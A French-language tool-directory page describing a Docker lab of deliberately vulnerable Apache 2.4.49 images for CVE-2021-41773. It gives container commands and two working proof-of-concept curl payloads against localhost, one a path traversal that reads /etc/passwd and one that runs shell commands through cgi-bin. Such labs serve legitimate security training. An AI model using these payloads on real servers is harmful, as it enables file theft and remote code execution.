Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41773S — # Laboratoire vulnérable basé sur Docker pour CVE-2021-41773, traversée de chemin Apache, fournissant des configurations de PoC pour la lecture de fichiers et l'exécution de code à distance dans un environnement contrôlé. | Kitploit
Outils/GitHubGitHub/mightysai1997/cve-2021-41773s
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubmightysai1997/cve-2021-41773s

CVE-2021-41773S

# Laboratoire vulnérable basé sur Docker pour CVE-2021-41773, traversée de chemin Apache, fournissant des configurations de PoC pour la lecture de fichiers et l'exécution de code à distance dans un environnement contrôlé.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
12il y a 9 moisPas encore vérifié

Images Docker vulnérables pour CVE-2021-41773 contournement de chemin Apache

Cette vulnérabilité ne s'applique qu'à la version 2.4.49 qui possède des configurations non standard spécifiques. Dans certaines situations, cela peut entraîner une lecture de fichier ou une exécution de code.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Configuration vulnérable pour la lecture de fichier

Les conteneurs peuvent être tirés directement de Docker Hub en utilisant

docker pull blueteamsteve/cve-2021-41773:no-cgid

et exécutés en utilisant

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Les journaux Apache peuvent être consultés avec la commande ci-dessous, ou vous pouvez simplement retirer le "-dit" de la commande d'exécution ci-dessus pour diffuser stdio docker logs <container-id>

PoC pour la lecture de fichier

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Configuration vulnérable pour l'exécution de code (RCE)

Les conteneurs peuvent être tirés directement de Docker Hub en utilisant

docker pull blueteamsteve/cve-2021-41773:with-cgid

et exécutés en utilisant

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Les journaux Apache peuvent être consultés avec la commande ci-dessous, ou vous pouvez simplement retirer le "-dit" de la commande d'exécution ci-dessus pour diffuser stdio docker logs <container-id>

PoC pour l'exécution de code (RCE)

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Construire des conteneurs Docker personnalisés

Modifiez et construisez vos propres versions en utilisant le dockerfile et les fichiers httpd.conf modèles dans les sous-répertoires

  • Utilisez ./no-cgi pour la configuration vulnérable à la lecture de fichier
  • Utilisez ./with-cgi pour la configuration vulnérable à l'exécution de code
Télécharger l’outil